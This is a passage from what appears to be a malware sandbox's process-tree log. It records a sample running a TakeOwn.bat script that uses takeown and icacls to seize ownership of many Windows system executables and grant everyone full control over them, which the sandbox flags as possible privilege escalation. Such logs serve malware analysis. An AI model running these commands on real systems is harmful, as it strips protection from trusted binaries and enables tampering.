    3⤵
    PID:4104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:1956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe" /grant "everyone":(f)
    3⤵
    PID:876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
  2⤵
  PID:2128
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" /grant "everyone":(f)
    3⤵
    PID:4732
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
  2⤵
  PID:2096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:4592
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:4840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
  2⤵
  PID:3260
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4452
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe" /grant "everyone":(f)
    3⤵
    PID:5508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
  2⤵
  PID:2192
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe" /grant "everyone":(f)
    3⤵
    PID:4268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
  2⤵
  PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
    3⤵
    PID:5732
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe" /grant "everyone":(f)
    3⤵
    PID:5476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
  2⤵
  PID:5632
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1432
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe" /grant "everyone":(f)
    3⤵
    PID:1488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
  2⤵
  PID:5320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
    3⤵
    PID:2628
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:3720
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
  2⤵
  PID:5472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
  2⤵
  PID:5484
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
    3⤵
    PID:5456
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /grant "everyone":(f)
    3⤵
    PID:4568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
  2⤵
  PID:4528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe" /grant "everyone":(f)
    3⤵
    PID:5448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
  2⤵
  PID:5220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
  2⤵
  PID:4808
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
    3⤵
    - Modifies file permissions
    PID:1492
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" /grant "everyone":(f)
    3⤵
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
  2⤵
  PID:5428
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5956
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe" /grant "everyone":(f)
    3⤵
    PID:5652
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
  2⤵
  PID:4552
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe" /grant "everyone":(f)
    3⤵
    PID:348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
  2⤵
  PID:6112
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:4884
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /grant "everyone":(f)
    3⤵
    PID:4364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
  2⤵
  PID:5040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe" /grant "everyone":(f)
    3⤵
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
  2⤵
  PID:3848
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
    3⤵
    PID:524
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe" /grant "everyone":(f)
    3⤵
    PID:6100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
  2⤵
  PID:2720
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" /grant "everyone":(f)
    3⤵
    PID:5948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
  2⤵
  PID:3980
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
    3⤵
    PID:5972
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
  2⤵
  PID:828
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe" /grant "everyone":(f)
    3⤵
    PID:3716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:4692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
  2⤵
  PID:4600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe" /grant "everyone":(f)
    3⤵
    PID:824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
  2⤵
  PID:5976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:432
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe" /grant "everyone":(f)
    3⤵
    PID:5232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
  2⤵
  PID:2676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
    3⤵
    - Modifies file permissions
    PID:1040
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe" /grant "everyone":(f)
    3⤵
    PID:2796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
  2⤵
  PID:2788
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:5200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
  2⤵
  PID:4596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
    3⤵
    PID:4928
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /grant "everyone":(f)
    3⤵
    PID:2332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
  2⤵
  PID:364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
    3⤵
    PID:5324
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\MiracastView\MiracastView.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\MiracastView\MiracastView.exe"
    3⤵
    PID:5600
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\MiracastView\MiracastView.exe" /grant "everyone":(f)
    3⤵
    PID:5628
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\msagent\AgentSvr.exe"
  2⤵
  PID:5820
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\msagent\AgentSvr.exe"
    3⤵
    - Modifies file permissions
    PID:32
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\msagent\AgentSvr.exe" /grant "everyone":(f)
    3⤵
    PID:5784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\notepad.exe"
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\notepad.exe"
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\notepad.exe" /grant "everyone":(f)
    3⤵
    PID:5796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\PrintDialog\PrintDialog.exe"
  2⤵
  PID:1868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\PrintDialog\PrintDialog.exe"
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\PrintDialog\PrintDialog.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\regedit.exe"
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\regedit.exe"
    3⤵
    PID:5676
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\regedit.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5328
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\TrustedInstaller.exe"
  2⤵
  PID:5180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\servicing\TrustedInstaller.exe"
    3⤵
    PID:212
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\servicing\TrustedInstaller.exe" /grant "everyone":(f)
    3⤵
    PID:2968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Speech\Common\sapisvr.exe"
  2⤵
  PID:3572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\Speech\Common\sapisvr.exe"
    3⤵
    PID:424
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\Speech\Common\sapisvr.exe" /grant "everyone":(f)
    3⤵
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\splwow64.exe"
  2⤵
  PID:3656
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\splwow64.exe"
    3⤵
    PID:4952
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\splwow64.exe" /grant "everyone":(f)
    3⤵
    PID:4200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\sysmon.exe"
  2⤵
  PID:1848
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\sysmon.exe"
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\sysmon.exe" /grant "everyone":(f)
    3⤵
    PID:5824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\appidtel.exe"
  2⤵
  PID:3048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\appidtel.exe"
    3⤵
    - Modifies file permissions
    PID:3840
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\appidtel.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\ARP.EXE"
  2⤵
  PID:4652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\ARP.EXE"
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\ARP.EXE" /grant "everyone":(f)
    3⤵
    PID:4640
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\at.exe"
  2⤵
  PID:2116
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\at.exe"
    3⤵
    - Possible privilege escalation attempt
    PID:2820
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\at.exe" /grant "everyone":(f)
    3⤵
    PID:4644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\AtBroker.exe"
  2⤵
  PID:3652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\AtBroker.exe"
    3⤵
    PID:6060
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\AtBroker.exe" /grant "everyone":(f)
    3⤵
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\attrib.exe"
  2⤵
  PID:5500
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\attrib.exe"
    3⤵
    PID:5300
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\attrib.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\auditpol.exe"
  2⤵
  PID:4264
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\auditpol.exe"
    3⤵
    PID:4940
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\auditpol.exe" /grant "everyone":(f)
    3⤵
    PID:5700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\autochk.exe"
  2⤵
  PID:2176
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1488
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\autochk.exe"
    3⤵
    PID:5640
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\autochk.exe" /grant "everyone":(f)
    3⤵
    PID:5872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\autoconv.exe"
  2⤵
  PID:5088
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3720
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\autoconv.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2312
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\autoconv.exe" /grant "everyone":(f)
    3⤵
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\autofmt.exe"
  2⤵
  PID:5388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\autofmt.exe"
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\autofmt.exe" /grant "everyone":(f)
    3⤵
    PID:2144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\backgroundTaskHost.exe"
  2⤵
  PID:5900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\backgroundTaskHost.exe"
    3⤵
    PID:5456
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\backgroundTaskHost.exe" /grant "everyone":(f)
    3⤵
    PID:3488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\System32\BackgroundTransferHost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\System32\BackgroundTransferHost.exe"
    3⤵
    PID:5392
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\System32\BackgroundTransferHost.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5344
- C:\Windows\SysWOW64\cmd.exe
